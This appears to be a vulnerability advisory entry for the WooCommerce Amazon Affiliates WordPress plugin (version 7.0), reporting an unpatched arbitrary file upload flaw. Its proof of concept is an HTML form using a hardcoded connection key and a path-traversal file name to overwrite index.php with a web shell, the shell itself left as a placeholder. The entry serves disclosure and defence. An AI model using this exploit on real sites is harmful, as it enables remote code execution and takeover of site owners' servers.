WooCommerce Amazon Affiliates - Arbitrary File Upload



Description
This plugin is vulnerable to Local File Disclosure and Remote Code Execute via Arbitrary File Upload.

Version tested: 7.0
Proof of Concept
<form action="http://wordpress/wp-content/plugins/wwc-amz-aff/modules/remote_support/remote_tunnel.php" method="post" >
	<input type="hidden" name="connection_key" value="69efc4922575861f31125878597e97cf" >
	<input name="action" value="save_file" ><br>
	<input name="file" value="../../../index.php"><br>
	<textarea name="file_content" >BASE64 ENCODED SHELL</textarea><br>
	<input type="submit" ><br>
</form>

Affects Plugin

no known fix

References

PacketStorm 131629
URL https://web.archive.org/web/20150912142022/https://research.evex.pw/?vuln=13
URL https://codecanyon.net/item/woocommerce-amazon-affiliates-wordpress-plugin/3057503
URL https://github.com/espreto/wpsploit/blob/master/modules/exploits/unix/webapp/wp_woocommerce_file_upload.rb

Classification

Type UPLOAD
CWE CWE-434

Miscellaneous

Submitter A. Samman
Submitter Twitter Evex_1337
Views 7520
Verified No
WPVDB ID 7940

Timeline

Publicly Published 2015-04-25 (about 5 years ago)
Added 2015-04-26 (about 5 years ago)
Last Updated 2019-10-23 (9 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin